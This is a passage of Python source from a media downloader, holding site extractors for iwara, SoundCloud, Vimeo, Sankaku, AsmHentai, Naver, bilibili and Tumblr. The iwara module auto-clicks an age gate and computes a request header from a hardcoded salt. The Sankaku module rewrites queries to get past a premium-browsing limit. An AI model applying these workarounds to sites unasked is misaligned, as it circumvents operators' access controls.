clf2.solve(url, cw=cw) session = r['session'] return session File: src/extractor/iwara_downloader.py import downloader from utils import Soup, urljoin, Downloader, LazyUrl, get_print, clean_url, clean_title, check_alive, Session, try_n, format_filename, tr_, get_ext, print_error, get_max_range import ree as re import errors import clf2 import hashlib import urllib from io import BytesIO from timee import time TIMEOUT = 300 PATTERN_ID = r'(image|video)/([0-9a-zA-Z_-]+)' class Downloader_iwara(Downloader): type = 'iwara' URLS = ['iwara.tv'] MAX_CORE = 16# single = True display_name = 'Iwara' ACCEPT_COOKIES = [r'(.*\.)?iwara\.tv'] @classmethod def fix_url(cls, url): url = clean_url(url) return url.split('?')[0] def init(self): self.session = Session() self.setTimeout(TIMEOUT) def read(self): info = get_info(self.url, self.session, self.cw) if info is None: return # embeded self.title = clean_title(info['title']) videos = info['files'] self.single = len(videos) < 2 # first video must be valid while videos: video = videos[0] try: video.url() break except Exception as e: e_ = e self.print_(print_error(e)) videos.remove(video) else: raise e_ if info.get('playlist', False): video = self.process_playlist(info['title'], videos) else: #6031 self.urls += [file.url for file in videos] self.enableSegment() url_thumb = video.url_thumb self.print_(f'url_thumb: {url_thumb}') if url_thumb: f = BytesIO() downloader.download(url_thumb, buffer=f, session=self.session, customWidget=self.cw) f.seek(0) self.setIcon(f) username = info.get('username') if username: self.artist = username class File: def __init__(self, type, url, referer, info, session, multi_post=False): title = info['title'] p = len(info['files']) self.url = LazyUrl(referer, lambda _: url, self) ext = get_ext(url) or downloader.get_ext(url, session=session) if type == 'video': id_ = re.find(PATTERN_ID, referer, err='no video id')[1] self.filename = format_filename(title, id_, ext) #4287 else: name = '{}_p{}'.format(clean_title(title), p) if multi_post else p self.filename = '{}{}'.format(name, ext) self.url_thumb = info.get('url_thumb') class LazyFile: def __init__(self, url, session, cw): self.session = session self.cw = cw self.url = LazyUrl(url, self.get, self) def get(self, url): info = get_info(url, self.session, self.cw) file = info['files'][0] self.filename = file.filename self.url_thumb = file.url_thumb return file.url() def get_token(session, cw=None): token = None def f(html, browser=None): def callback(r): nonlocal token token = r browser.runJavaScript('window.localStorage.getItem("token")', callback=callback) return bool(token) clf2.solve('https://iwara.tv', session=session, cw=cw, f=f, timeout=15) #print_(f'token: {token}') r = session.post('https://api.iwara.tv/user/token', headers={'Authorization': f'Bearer {token}'}) d = r.json() token = d['accessToken'] #print_(f'token2: {token}') return token @try_n(2) def get_info(url, session, cw, multi_post=False): print_ = get_print(cw) t0 = None def f(html, browser=None): nonlocal t0 soup = Soup(html) if t0 is None: t0 = time() if time() - t0 > 10 or '/profile/' in url.lower(): for a in soup.findAll('a'): if urljoin(url, a.get('href', '')) == urljoin(url, '/login'): raise errors.LoginRequired(method='browser', url='https://www.iwara.tv/login', cookie=False, w=1460) #5794 buttons = soup.findAll(class_='button--primary') if buttons: for i, button in enumerate(buttons): button_text = button.text if not button_text: continue print_(f'button: {button_text}') if button_text.lower() in ['i am over 18', 'continue']: browser.runJavaScript(f'btns=document.getElementsByClassName("button--primary");btns[{i}].click();') #5794#issuecomment-1517879513 if '/profile/' in url.lower(): return soup.find('div', class_='page-profile__header') is not None else: details = soup.find('div', class_='page-video__details') if details and not soup.find('div', class_='vjs-poster') and not soup.find(class_='embedPlayer__youtube'): #6737, #6836 print_('no poster') return False details = details or soup.find('div', class_='page-image__details') return details is not None and details.find('div', class_='text--h1') is not None html = clf2.solve(url, session=session, f=f, cw=cw, timeout=30)['html'] #5794 soup = Soup(html) info = {} info['files'] = [] type = url.split('/')[3] if type == 'profile': max_pid = get_max_range(cw) ids = set() sub = (url+'/').split('/')[5] if not sub: sub = 'videos' uid = url.split('/')[4] url_api = f'https://api.iwara.tv/profile/{uid}' j = downloader.read_json(url_api, session=session) info['username'] = username = j['user']['name'] info['id'] = id = j['user']['username'] info['title'] = f'[Channel] [{sub.capitalize()}] {username} ({id})' id = j['user']['id'] if sub == 'videos': info['playlist'] = True for p in range(100): url_api = f'https://api.iwara.tv/videos?page={p}&sort=date&user={id}' j = downloader.read_json(url_api, session=session) for post in j['results']: id_ = post['id'] if id_ in ids: continue ids.add(id_) slug = post['slug'] url_post = f'https://www.iwara.tv/video/{id_}/{slug}' file = LazyFile(url_post, session, cw) info['files'].append(file) if cw: cw.setTitle(tr_('읽는 중... {} ({} / {})').format(info['title'], len(ids), j['count'])) if len(info['files']) >= max_pid: break if j['limit']*(p+1) >= j['count']: break elif sub == 'images': for p in range(100): url_api = f'https://api.iwara.tv/images?page={p}&sort=date&user={id}' j = downloader.read_json(url_api, session=session) for post in j['results']: check_alive(cw) id_ = post['id'] if id_ in ids: continue ids.add(id_) slug = post['slug'] url_post = f'https://www.iwara.tv/image/{id_}/{slug}' info_post = get_info(url_post, session, cw, True) info['files'] += info_post['files'] print_(f'imgs: {len(info["files"])}') if cw: cw.setTitle(tr_('읽는 중... {} ({} / {})').format(info['title'], len(ids), j['count'])) if len(info['files']) >= max_pid: break if len(info['files']) >= max_pid: break if j['limit']*(p+1) >= j['count']: break else: raise NotImplementedError(f'profile: {sub}') return info details = soup.find('div', class_='page-video__details') or soup.find('div', class_='page-image__details') info['title'] = details.find('div', class_='text--h1').text.strip() info['username'] = soup.find('a', class_='username')['title'] soup.find('div', class_='videoPlayer') or soup.find('div', class_='page-image__slideshow') id = re.find(PATTERN_ID, url, err='no id')[1] try: token = get_token(session, cw=cw) except Exception as e: print_(print_error(e)) token = None url_api = f'https://api.iwara.tv/{type}/{id}' hdr = {} if token: hdr['authorization'] = f'Bearer {token}' data = downloader.read_json(url_api, url, session=session, headers=hdr) if data.get('embedUrl'): if cw and not cw.downloader.single: raise errors.Invalid('[iwara] Embeded: {}'.format(data['embedUrl'])) #5869 cw.downloader.pass_() cw.gal_num = cw.url = data['embedUrl'] d = Downloader.get('youtube')(data['embedUrl'], cw, cw.downloader.thread, 1) d.start() return if not data.get('files'): data['files'] = [data['file']] for file in data['files']: id_ = file['id'] if type == 'video': fileurl = data['fileUrl'] up = urllib.parse.urlparse(fileurl) q = urllib.parse.parse_qs(up.query) paths = up.path.rstrip('/').split('/') x_version = hashlib.sha1('_'.join((paths[-1], q['expires'][0], '5nFp9kmbNnHdAFhaqMvt')).encode()).hexdigest() # https://github.com/yt-dlp/yt-dlp/issues/6549#issuecomment-1473771047 j = downloader.read_json(fileurl, url, session=session, headers={'X-Version': x_version}) def key(x): if x['name'].lower() == 'source': return float('inf') try: return float(x['name']) except: return -1 x = sorted(j, key=key)[-1] print_(f'name: {x["name"]}') url_file = urljoin(url, x['src']['view']) poster = soup.find('div', class_='vjs-poster')['style'] info['url_thumb'] = urljoin(url, re.find(r'url\("(.+?)"', poster, err='no poster')) else: name = file['name'] url_file = f'https://i.iwara.tv/image/original/{id_}/{name}' if len(data['files']) == 1: multi_post = True# file = File(type, url_file, url, info, session, multi_post) info['files'].append(file) return info File: src/extractor/soundcloud_downloader.py #coding: utf8 import downloader from io import BytesIO from utils import Downloader, LazyUrl, get_print, try_n, lock, get_max_range, format_filename, limits import ffmpeg import ytdl from m3u8_tools import M3u8_stream CLIENT_ID = None @lock def get_cid(force=False): global CLIENT_ID if CLIENT_ID is None or force: print('update cid...') d = ytdl.YoutubeDL() e = ytdl.extractor.soundcloud.SoundcloudIE(d) e._update_client_id() CLIENT_ID = e._CLIENT_ID return CLIENT_ID class Audio: _url = None def __init__(self, url, album_art, cw=None): self.album_art = album_art self.cw = cw self.url = LazyUrl(url, self.get, self, pp=self.pp) @try_n(2) @limits(1) def get(self, url): print_ = get_print(self.cw) if self._url: return self._url ydl = ytdl.YoutubeDL() self.info = info = ydl.extract_info(url) formats = info['formats'] print(formats) def key(f): abr = f.get('abr') if abr is None: abr = 320 return int(abr) formats = sorted(formats, key=key, reverse=True) url_audio = None for format in formats: protocol = format['protocol'] print_('【{}】 format【{}】 abr【{}】'.format(protocol, format['format'], format.get('abr', 0))) if not url_audio and protocol in ['http', 'https']: url_audio = format['url'] if not url_audio: url_audio = M3u8_stream(formats[0]['url']) self.album_art = False# self.username = info['uploader'] self.title = '{} - {}'.format(self.username, info['title']) self.filename = format_filename(self.title, '', '.mp3') self._thumb = None def thumb(): if self._thumb is None: for t in info['thumbnails'][::-1]: width = t.get('width', 1080) if not 100 <= width <= 500: continue url_thumb = t['url'] f = BytesIO() try: downloader.download(url_thumb, buffer=f) break except Exception as e: print(e) f = None self._thumb = f else: f = self._thumb if f is not None: f.seek(0) return f self.thumb = thumb self._url = url_audio return self._url def pp(self, filename): if self.thumb() and self.album_art: ffmpeg.add_cover(filename, self.thumb(), {'artist':self.username, 'title':self.info['title']}, cw=self.cw) class Downloader_soundcloud(Downloader): type = 'soundcloud' single = True URLS = ['soundcloud.com'] #lock = True audio = None display_name = 'SoundCloud' ACCEPT_COOKIES = [r'(.*\.)?soundcloud\.com'] def init(self): if 'soundcloud.com' in self.url.lower(): self.url = self.url.replace('http://', 'https://') else: self.url = 'https://soundcloud.com/{}'.format(self.url) @classmethod def fix_url(cls, url): return url.split('?')[0] def read(self): album_art = self.ui_setting.albumArt.isChecked() info = get_audios(self.url, self.cw, album_art) audios = info['audios'] if not audios: raise Exception('no audios') # first audio must be valid while audios: audio = audios[0] try: audio.url() break except Exception as e: e_ = e print(e) audios.remove(audio) else: raise e_ if len(audios) > 1: audio = self.process_playlist(info['title'], audios) else: self.urls.append(audio.url) self.title = audio.title self.artist = audio.username self.setIcon(audio.thumb()) @try_n(2) def get_audios(url, cw, album_art): print_ = get_print(cw) url = url.rstrip('/') if url.count('/') == 3: url += '/tracks' options = { 'extract_flat': True, 'playlistend': get_max_range(cw), } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(url) if 'entries' in info: entries = info['entries'] title = info['title'] for _type in ['All', 'Tracks', 'Albums', 'Sets', 'Reposts', 'Likes', 'Spotlight']: x = '({})'.format(_type) if x in title: title = title.replace(x, '') kind = _type break else: kind = 'Playlist' print_('kind: {}'.format(kind)) info['title'] = '[{}] {}'.format(kind.capitalize(), title) else: entries = [info] audios = [] for e in entries: url = e.get('webpage_url') or e['url'] if '/sets/' in url: continue audio = Audio(url, album_art, cw=cw) audios.append(audio) info['audios'] = audios return info File: src/extractor/vimeo_downloader.py import downloader from io import BytesIO as IO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl class Downloader_vimeo(Downloader): type = 'vimeo' URLS = ['vimeo.com'] single = True ACCEPT_COOKIES = [r'(.*\.)?vimeo\.com'] def init(self): if 'vimeo.com' not in self.url.lower(): self.url = 'https://vimeo.com/{}'.format(self.url) def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(4) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['protocol'] in ['http', 'https']] fs = sorted(fs, key=lambda f: int(f.get('width', 0)), reverse=True) if not fs: raise Exception('No MP4 videos') f = fs[0] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] url_video = f['url'] ext = get_ext(url) or '.mp4' self.filename = format_filename(self.title, info['id'], ext) self._url = url_video return self._url File: src/extractor/sankaku_downloader.py #coding: utf-8 #https://chan.sankakucomplex.com/ #https://idol.sankakucomplex.com/ #https://beta.sankakucomplex.com/ #https://sankaku.app/ #http://white.sankakucomplex.com/ #https://www.sankakucomplex.com/ import downloader import ree as re from utils import Downloader, urljoin, query_url, get_max_range, get_print, Soup, lazy, Session, clean_title, check_alive, File, get_ext, limits, clean_url from translator import tr_ import os from timee import sleep from error_printer import print_error from urllib.parse import quote import errors import utils class File_sankaku(File): type = 'sankaku' format = 'id' def get(self): print_ = get_print(self.cw) referer = self['referer'] for try_ in range(4): wait(self.cw) html = '' try: html = downloader.read_html(referer, session=self.session) soup = Soup(html) highres = soup.find(id='highres') url = urljoin(referer, highres['href'] if highres else soup.find(id='image')['src']) break except Exception as e: e_msg = print_error(e) if '429 Too many requests'.lower() in html.lower(): t_sleep = 120 * min(try_ + 1, 2) e = '429 Too many requests... wait {} secs'.format(t_sleep) elif 'post-content-notification' in html: # sankaku plus print_('Sankaku plus: {}'.format(self['id'])) return '' else: t_sleep = 5 s = '[Sankaku] failed to read image (id:{}): {}'.format(self['id'], e) print_(s) sleep(t_sleep, self.cw) else: raise Exception('can not find image (id:{})\n{}'.format(self['id'], e_msg)) soup = Soup('<p>{}</p>'.format(url)) url = soup.string d = { 'id': self['id'], } return {'url': url, 'name': utils.format('sankaku', d, get_ext(url))} class Downloader_sankaku(Downloader): type = 'sankaku' URLS = ['chan.sankakucomplex.com', 'idol.sankakucomplex.com', 'www.sankakucomplex.com'] MAX_CORE = 4 display_name = 'Sankaku Complex' ACCEPT_COOKIES = [r'(.*\.)?(sankakucomplex\.com|sankaku\.app)'] def init(self): type = self.url.split('sankakucomplex.com')[0].split('//')[-1].strip('.').split('.')[-1] if type == '': type = 'www' if type not in ['chan', 'idol', 'www']: raise Exception('Not supported subdomain') self.type_sankaku = type self.url = self.url.replace('&commit=Search', '') self.url = clean_url(self.url) self.session = Session() @lazy def soup(self): html = downloader.read_html(self.url, session=self.session) return Soup(html) @classmethod def fix_url(cls, url): if 'sankakucomplex.com' not in url: url = url.replace(' ', '+') while '++' in url: url = url.replace('++', '+') url = quote(url) url = url.replace('%2B', '+') url = url.replace('%20', '+')# if url.startswith('[chan]'): type = 'chan' url = url.replace('[chan]', '', 1).strip() elif url.startswith('[idol]'): type = 'idol' url = url.replace('[idol]', '', 1).strip() elif url.startswith('[www]'): type = 'www' url = url.replace('[www]', '', 1).strip() else: raise Exception('Not supported subdomain') url = 'https://{}.sankakucomplex.com/?tags={}'.format(type, url) return url.replace('http://', 'https://') @lazy def id(self): if self.type_sankaku == 'www': id = '[www] ' + self.soup.find('h1', class_='entry-title').text.strip() else: if '/post/show/' in self.url or '/posts/' in self.url: #6718 id = get_id(self.url, self.soup) else: qs = query_url(self.url) tags = qs.get('tags', []) tags.sort() id = ' '.join(tags) if not id: id = 'N/A' id = '[{}] {}'.format(self.type_sankaku, id) return clean_title(id) @property def name(self): return self.id def read(self): ui_setting = self.ui_setting self.title = self.name types = ['img', 'gif', 'video'] if ui_setting.exFile.isChecked(): if ui_setting.exFileImg.isChecked(): types.remove('img') if ui_setting.exFileGif.isChecked(): types.remove('gif') if ui_setting.exFileVideo.isChecked(): types.remove('video') if self.type_sankaku == 'www': imgs = get_imgs_www(self.url, self.soup) else: info = get_imgs(self.url, self.name, cw=self.cw, types=types, session=self.session) self.single = info['single'] imgs = info['imgs'] self.urls += imgs self.title = self.name def get_imgs_www(url, soup): imgs = [] view = soup.find('div', class_='entry-content') for img in view.findAll('img'): img = img.get('data-lazy-src') if not img: # no script continue img = urljoin(url, img) if img in imgs: print('duplicate', img) continue imgs.append(img) return imgs def setPage(url, page): # Always use HTTPS url = url.replace('http://', 'https://') # Change the page if 'page=' in url: url = re.sub(r'page=[0-9]*', 'page={}'.format(page), url) else: url += '&page={}'.format(page) return url @limits(6) def wait(cw): check_alive(cw) def get_imgs(url, title=None, cw=None, types=['img', 'gif', 'video'], session=None): print_ = get_print(cw) print_('types: {}'.format(', '.join(types))) if 'chan.sankakucomplex' in url: type = 'chan' elif 'idol.sankakucomplex' in url: type = 'idol' else: raise Exception('Not supported subdomain') info = {} info['single'] = False if '/post/show/' in url or '/posts/' in url: #6718 info['single'] = True id = get_id(url) info['imgs'] = [File_sankaku({'type': type, 'id': id, 'referer': url})] return info # Range max_pid = get_max_range(cw) local_ids = {} if cw is not None: dir = cw.downloader.dir try: names = os.listdir(dir) except Exception as e: print(e) names = [] for name in names: id = os.path.splitext(name)[0] local_ids[id] = os.path.join(dir, name) imgs = [] page = 1 ids = set() url_old = 'https://{}.sankakucomplex.com'.format(type) if cw is not None: cw.setTitle('{} {}'.format(tr_('읽는 중...'), title)) while len(imgs) < max_pid: #if page > 25: # Anonymous users can only view 25 pages of results # break wait(cw) #url = setPage(url, page) print_(url) try: html = downloader.read_html(url, referer=url_old, session=session) except Exception as e: #3366 print_(print_error(e)) break if '429 Too many requests'.lower() in html.lower(): print_('429 Too many requests... wait 120 secs') sleep(120, cw) continue page += 1 url_old = url soup = Soup(html) for banner in soup.findAll('div', class_='has-mail'): #5861 banner.decompose() banner = soup.find('div', class_='popular-previews') if banner: #6171 banner.decompose() err = soup.find('div', class_='post-premium-browsing_error') if err and not imgs: raise errors.LoginRequired(err.text.strip()) articles = soup.findAll('span', {'class': 'thumb'}) if not articles: if soup.find(class_='post-premium-browsing_error'): #6418 print_('premium error') tags = utils.query_url(url)['tags'][0] tags = re.sub(r'id_range:<[0-9]+', '', tags).strip() tags += f' id_range:<{min(ids)}' url = utils.update_url_query(url, {'tags': tags}) url = re.sub(r'&page=[0-9]+', '', url) url = re.sub(r'&next=[0-9]+', '', url) continue print_('no articles') break for article in articles: # 1183 tags = article.find('img', class_='preview')['data-auto_page'].split() #6718 if 'animated_gif' in tags: type_ = 'gif' elif 'animated' in tags or 'webm' in tags or 'video' in tags or 'mp4' in tags: # 1697 type_ = 'video' else: type_ = 'img' if type_ not in types: continue url_img = article.a['href'] if not url_img.startswith('http'): url_img = urljoin('https://{}.sankakucomplex.com'.format(type), url_img) if 'get.sankaku.plus' in url_img: # sankaku plus continue id = int(re.find(r'p([0-9]+)', article['id'], err='no id')) #5892 #print_(article) if str(id) in local_ids: #print('skip', id) local = True else: local = False #print(url_img) if id not in ids: ids.add(id) if local: img = local_ids[str(id)] else: img = File_sankaku({'type':type, 'id':id, 'referer':url_img}) imgs.append(img) if len(imgs) >= max_pid: break try: # For page > 50 pagination = soup.find('div', class_='pagination') url = urljoin('https://{}.sankakucomplex.com'.format(type), utils.html.unescape(pagination['next-page-url'])) #6326 ## #3366 ## p = int(re.find(r'[?&]page=([0-9]+)', url, default=1)) ## if p > 100: ## break except Exception as e: print_(print_error(e)) #url = setPage(url, page) break if cw is not None: cw.setTitle('{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs))) else: print(len(imgs), 'imgs') if not imgs: raise Exception('no images') info['imgs'] = imgs return info def get_id(url, soup=None): if soup is None: html = downloader.read_html(url) soup = Soup(html) if x := soup.find('input', id='post_id'): return x['value'] return soup.find('p', id='hidden_post_id').string File: src/extractor/asmhentai_downloader.py #coding: utf8 import downloader import ree as re from utils import Soup, urljoin, Downloader, join, Session, File, clean_title, limits import os import utils def get_id(url): try: return int(url) except: return int(re.find('/(g|gallery)/([0-9]+)', url)[1]) class File_asmhentai(File): type = 'asmhentai' format = 'name' @limits(.25) def get(self): soup = downloader.read_soup(self['referer'], self['rereferer'], session=self.session) img = soup.find('img', id='fimg') url = img['data-src'] name, ext = os.path.splitext(os.path.basename(url).split('?')[0]) d = { 'name': clean_title(name), } return {'url': url, 'name': utils.format('asmhentai', d, ext)} class Downloader_asmhentai(Downloader): type = 'asmhentai' URLS = ['asmhentai.com'] MAX_CORE = 8 display_name = 'AsmHentai' ACCEPT_COOKIES = [r'(.*\.)?asmhentai\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) return f'https://asmhentai.com/g/{id_}/' def read(self): info = get_info(self.url, self.session, self.cw) self.print_(info) # 1225 artist = join(info['artist']) self.artist = artist group = join(info['group']) if info['group'] else 'N/A' lang = info['language'][0] if info['language'] else 'N/A' series = info['parody'][0] if info['parody'] else 'N/A' title = self.format_title(info['category'][0], info['id'], info['title'], artist, group, series, lang) for i in range(info['n']): url = f'https://asmhentai.com/gallery/{info["id"]}/{i+1}/' file = File_asmhentai({'referer':url, 'rereferer': self.url}) self.urls.append(file) self.title = title def get_info(url, session, cw): html = downloader.read_html(url, session=session) soup = Soup(html) info = {} info['id'] = get_id(url) title = soup.find('h1').text.strip() info['title'] = title for tag in soup.findAll('span', class_='tag'): href = tag.parent.attrs['href'] href = urljoin(url, href).strip('/') key = href.split('/')[3] value = href.split('/')[-1] if key == 'language' and value == 'translated': continue if key in info: info[key].append(value) else: info[key] = [value] for key in ['artist', 'group', 'parody', 'tag', 'character']: if key not in info: info[key] = [] info['n'] = int(soup.find('input', id='t_pages')['value']) return info File: src/extractor/naver_downloader.py #coding:utf-8 import downloader import ree as re from utils import urljoin, Downloader, Soup, LazyUrl, clean_title, get_ext, get_print, Session, json import errors PATTERNS = ['.*blog.naver.com/(?P<username>.+)/(?P<pid>[0-9]+)', '.*blog.naver.com/.+?blogId=(?P<username>[^&]+).+?logNo=(?P<pid>[0-9]+)', '.*?(?P<username>[0-9a-zA-Z_-]+)\.blog\.me/(?P<pid>[0-9]+)'] def get_id(url): for pattern in PATTERNS: m = re.match(pattern, url) if m is None: continue username = m.group('username') pid = m.group('pid') break else: username, pid = None, None return username, pid class Downloader_naver(Downloader): type = 'naver' URLS = ['blog.naver.', '.blog.me'] display_name = 'Naver Blog' ACCEPT_COOKIES = [r'(.*\.)?naver\.com', r'(.*\.)?blog\.me'] def init(self): self.session = Session() username, pid = get_id(self.url) if username is None: raise errors.Invalid(f'Invalid format: {self.url}') self.url = f'https://blog.naver.com/{username}/{pid}' @property def name(self): username, pid = get_id(self.url) return clean_title(f'{username}/{pid}') def read(self): self.title = f'읽는 중... {self.name}' imgs = get_imgs(self.url, self.session, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name class Image: def __init__(self, url, referer, p): self.url = LazyUrl(referer, lambda _: url, self) #3788, #3817 ext = get_ext(url) self.filename = f'{p:04}{ext}' class Video: def __init__(self, url, referer, p): self.url = LazyUrl(referer, lambda _: url, self) self.filename = f'video_{p}.mp4' def read_page(url, session, depth=0): print('read_page', url, depth) if depth > 10: raise Exception('Too deep') html = downloader.read_html(url, session=session) if len(html) < 5000: id = re.find('logNo=([0-9]+)', html, err='no id') username = re.find('blog.naver.com/([0-9a-zA-Z]+)', url) or re.find('blogId=([0-9a-zA-Z]+)', url, err='no username') url = f'https://m.blog.naver.com/PostView.nhn?blogId={username}&logNo={id}&proxyReferer=' soup = Soup(html) if soup.find('div', {'id': 'viewTypeSelector'}): return url, soup frame = soup.find('frame') if frame is None: print('frame is None') return read_page(url, session, depth+1) return read_page(urljoin('https://blog.naver.com', frame.attrs['src']), session, depth+1) def get_imgs(url, session, cw): print_ = get_print(cw) url = url.replace('blog.naver', 'm.blog.naver') referer = url url_frame, soup = read_page(url, session) imgs = [] urls = set() view = soup.find('div', {'id': 'viewTypeSelector'}) print('view', view is not None) imgs_ = view.findAll('span', class_='_img') + view.findAll('img') for img in imgs_: url = img.attrs.get('src') if not url: url = img.attrs.get('thumburl') if not url: continue if 'ssl.pstatic.net' in url: # continue if 'blogpfthumb-phinf.pstatic.net' in url: # profile continue if 'dthumb-phinf.pstatic.net' in url: # link continue if 'storep-phinf.pstatic.net' in url: # emoticon continue url = url.replace('mblogthumb-phinf', 'blogfiles') #url = re.sub('\?type=[a-zA-Z0-9]*', '?type=w1@2x', url) #url = re.sub('\?type=[a-zA-Z0-9]*', '', url) url = url.split('?')[0] if url in urls: print('### Duplicate:', url) continue urls.add(url) #url = url.split('?type=')[0] img = Image(url, referer, len(imgs)) imgs.append(img) pairs = [] for video in soup.findAll(class_='_naverVideo'): vid = video.attrs['vid'] key = video.attrs['key'] pairs.append((vid, key)) print_(f'pairs: {pairs}') for script in soup.findAll('script', class_='__se_module_data'): data_raw = script['data-module'] data = json.loads(data_raw)['data'] vid = data.get('vid') if not vid: continue key = data['inkey'] pairs.append((vid, key)) videos = [] for vid, key in pairs: url_api = f'https://apis.naver.com/rmcnmv/rmcnmv/vod/play/v2.0/{vid}?key={key}' data_raw = downloader.read_html(url_api, session=session) data = json.loads(data_raw) fs = data['videos']['list'] fs = sorted(fs, key=lambda f: f['size'], reverse=True) video = Video(fs[0]['source'], url_frame, len(videos)) videos.append(video) return imgs + videos File: src/extractor/bili_downloader.py import downloader import downloader_v3 from utils import Downloader, get_print, format_filename, clean_title, get_resolution, try_n, Session, uuid, File, get_max_range, query_url import os from io import BytesIO import ffmpeg import math import ree as re import ytdl import constants from putils import DIR import threading import errors _VALID_URL = r'''(?x) https?:// (?:(?:www|bangumi)\.)? bilibili\.(?:tv|com)/ (?: (?: video/[aA][vV]| anime/(?P<anime_id>\d+)/play\# )(?P<id_bv>\d+)| video/[bB][vV](?P<id>[^/?#&]+) ) ''' class File_bili(File): type = 'bili' thread_audio = None @try_n(4) def get(self): session = self.session cw = self.cw print_ = get_print(cw) options = { #'noplaylist': True, #5562 #'extract_flat': True, 'playlistend': 1, } ydl = ytdl.YoutubeDL(options, cw=cw) info = ydl.extract_info(self['referer']) #5562 entries = info.get('entries') if entries: info.update(entries[0]) fs = info['formats'] res = max(get_resolution(), min(f.get('height', 0) for f in fs)) print_(f'res: {res}') fs = [f for f in fs if f.get('height', 0) <= res] for f in fs: print_(f"{f['format']} - {f['url']}") f_video = sorted(fs, key=lambda f:(f.get('height', 0), f.get('vbr', 0)))[-1] print_('video: {}'.format(f_video['format'])) if f_video.get('abr'): f_audio = None else: fs_audio = sorted([f_audio for f_audio in fs if f_audio.get('abr')], key=lambda f:f['abr']) if fs_audio: f_audio = fs_audio[-1] else: raise Exception('no audio') print_('audio: {}'.format(f_audio['format'])) title = info['title'] url_thumb = info['thumbnail'] ext = info['ext'] session.headers.update(info.get('http_headers', {})) mobj = re.match(_VALID_URL, self['referer']) video_id = mobj.group('id') info = { 'url': f_video['url'], 'url_thumb': url_thumb, 'name': format_filename(title, video_id, ext), } if f_audio: def f(): audio = f_audio['url'] path = os.path.join(DIR, f'{uuid()}_a.tmp') if cw is not None: cw.trash_can.append(path) if constants.FAST: downloader_v3.download(audio, session=self.session, chunk=1024*1024, n_threads=2, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) else: downloader.download(audio, session=self.session, outdir=os.path.dirname(path), fileName=os.path.basename(path), customWidget=cw, overwrite=True) self.audio_path = path print_('audio done') self.thread_audio = threading.Thread(target=f, daemon=True) self.thread_audio.start() return info def pp(self, filename): if self.thread_audio: self.thread_audio.join() ffmpeg.merge(filename, self.audio_path, cw=self.cw) return filename # 1804 @try_n(2) def fix_url(url, cw=None): print_ = get_print(cw) if '?' in url: tail = url.split('?')[1] else: tail = None soup = downloader.read_soup(url, methods={'requests'}) err = soup.find('div', class_='error-text') if err: raise errors.Invalid('{}: {}'.format(err.text.strip(), url)) meta = soup.find('meta', {'itemprop': 'url'}) if meta: url_new = meta.attrs['content'] if tail: url_new = '{}?{}'.format(url_new, tail) print_('redirect: {} -> {}'.format(url, url_new)) else: url_new = url print_('no redirect') return url_new class Downloader_bili(Downloader): type = 'bili' URLS = [r'regex:'+_VALID_URL, 'space.bilibili.com/'] lock = True detect_removed = False detect_local_lazy = False display_name = 'bilibili' single = True ACCEPT_COOKIES = [r'(.*\.)?bilibili\.com'] def init(self): self.url = fix_url(self.url, self.cw) if 'bilibili.com' not in self.url.lower(): self.url = 'https://www.bilibili.com/video/{}'.format(self.url) self.url = self.url.replace('m.bilibili', 'bilibili') self.session = Session() @classmethod def key_id(cls, url): mobj = re.match(_VALID_URL, url) video_id = mobj.group('id') qs = query_url(url) p = qs.get('p', ['1'])[0] #6580 return f'{video_id or url} {p}' @property def id_(self): mobj = re.match(_VALID_URL, self.url) video_id = mobj.group('id') #anime_id = mobj.group('anime_id') return video_id def read(self): sd = self.session.cookies.get('SESSDATA', domain='.bilibili.com') self.print_('sd: {}'.format(sd)) if not sd: #5647 self.cw.showCookie() self.cw.showLogin('https://passport.bilibili.com/login', 1030, None) sid = re.find(r'/channel/collectiondetail?sid=([0-9]+)', self.url) mid = re.find(r'space.bilibili.com/([0-9]+)', self.url) if sid or mid: if not sd: raise errors.LoginRequired() if sid: url_api = f'https://api.bilibili.com/x/polymer/web-space/seasons_archives_list?mid={mid}&season_id={sid}' j = downloader.read_json(url_api, self.url) title = clean_title(j['data']['meta']['name']) elif mid: url_api = f'https://api.bilibili.com/x/space/wbi/acc/info?mid={mid}' j = downloader.read_json(url_api, self.url) title = clean_title(j['data']['name']) else: raise NotImplementedError() self.single = False options = { 'extract_flat': True, 'playlistend': get_max_range(self.cw), } ydl = ytdl.YoutubeDL(options, cw=self.cw) info = ydl.extract_info(self.url) files = [] for e in info['entries']: files.append(File_bili({'referer': e['url']})) self.print_(f'urls: {len(files)}') file = self.process_playlist(title, files) self.title = title else: file = File_bili({'referer': self.url}) file.ready(self.cw) self.urls.append(file) self.title = os.path.splitext(file['name'])[0] thumb = BytesIO() downloader.download(file['url_thumb'], buffer=thumb) self.setIcon(thumb) n = int(math.ceil(8.0 / len(self.urls))) self.print_(f'n_threads: {n}') self.enableSegment(n_threads=n, overwrite=True) File: src/extractor/tumblr_downloader.py #coding:utf8 import downloader from translator import tr_ from utils import Session, query_url, get_max_range, Downloader, clean_title, update_url_query, get_print, get_ext, LazyUrl, urljoin, check_alive, limits import ree as re import errors from error_printer import print_error class Image: def __init__(self, url, id, referer, p, cw=None): self._url = url self.id_ = id self.p = p self.cw = cw self.url = LazyUrl(referer, self.get, self) @limits(.25) def get(self, _): print_ = get_print(self.cw) url = self._url ext = get_ext(url) if ext.lower()[1:] not in ['jpg', 'png', 'mp4']: #4645 print_('get_ext: {}, {}'.format(self.id_, url)) try: ext = downloader.get_ext(url, referer=_) except Exception as e: #3235 print_('Err: {}, {}\n'.format(self.id_, url)+print_error(e)) self.filename = '{}_p{}{}'.format(self.id_, self.p, ext) return url class Downloader_tumblr(Downloader): type = 'tumblr' URLS = ['tumblr.com'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?tumblr\.com'] def init(self): if 